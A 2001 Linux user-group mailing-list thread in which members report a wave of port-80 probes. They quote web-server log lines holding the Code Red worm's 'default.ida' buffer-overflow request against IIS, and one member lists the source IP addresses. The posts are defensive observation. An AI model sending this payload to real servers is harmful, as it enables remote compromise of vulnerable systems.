[TCLUG] Lots of denied packets. Port 80

[Thomas Eibner]

On Thu, Jul 19, 2001 at 04:51:51PM -0500, Florin Iucha wrote:
> On Thu, Jul 19, 2001 at 11:37:13PM +0200, Thomas Eibner wrote:
> > On Thu, Jul 19, 2001 at 05:28:52PM -0400, Dan Drake wrote:
> > > On Thu, Jul 19, 2001 at 11:23:27PM +0200, Thomas Eibner wrote:
> > > > On Thu, Jul 19, 2001 at 09:16:42PM +0000, kblack at isd.net wrote:
> > > > > Is anybody else running a firewall
> > > > > (and blocking port 80)
> > > > > noticing an unusual number of attacks today?
> > > 
> > >   Hmmmm. I'm seeing a lot of weird requests for "default.ida" in my logs
> > > (I'm running a web server and not blocking port 80). The accesses look
> > > weird, too...from a bunch of different IPs. I also have "Malformed HTTP
> > > header" (or something like that) in my error log.
> > 
> > 211.236.188.150 - - [19/Jul/2001:23:04:43 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 333 "-" "-"
> > ip44-137.asiaonline.net - - [19/Jul/2001:23:12:21 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 333 "-" "-"
> > 212.113.168.95 - - [19/Jul/2001:23:32:21 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 333 "-" "-"
> > 
> > Like these I take it?
> > 
> 
> The same here from these guys...
> 
> 213.26.234.70
> 209.223.50.51
> 207.101.212.130
> 212.163.165.26
> 65.3.198.239
> 198.145.154.193
> 211.62.36.37
> 211.172.225.63
> 202.123.80.2
> 150.164.98.130
> 24.184.153.172
> 133.66.35.7
> 62.49.221.130
> 210.160.177.165
> 12.76.115.253
> 149.169.25.4
> 193.183.19.90
> 66.46.75.98

Yeah, tons more, and it seems somewhere my provider has a broken IIS
box:
seugling.ne.mediaone.net 

> 41A9 2BDE 8E11 F1C5 87A6  03EE 34B3 E075 3B90 DFE4

I ponder about this and tried some perl to decode it, but all I got
was crap, is there something about it? :)

-- 
  Thomas Eibner <http://thomas.eibner.dk/> DnsZone <http://dnszone.org/>
  mod_pointer <http://stderr.net/mod_pointer>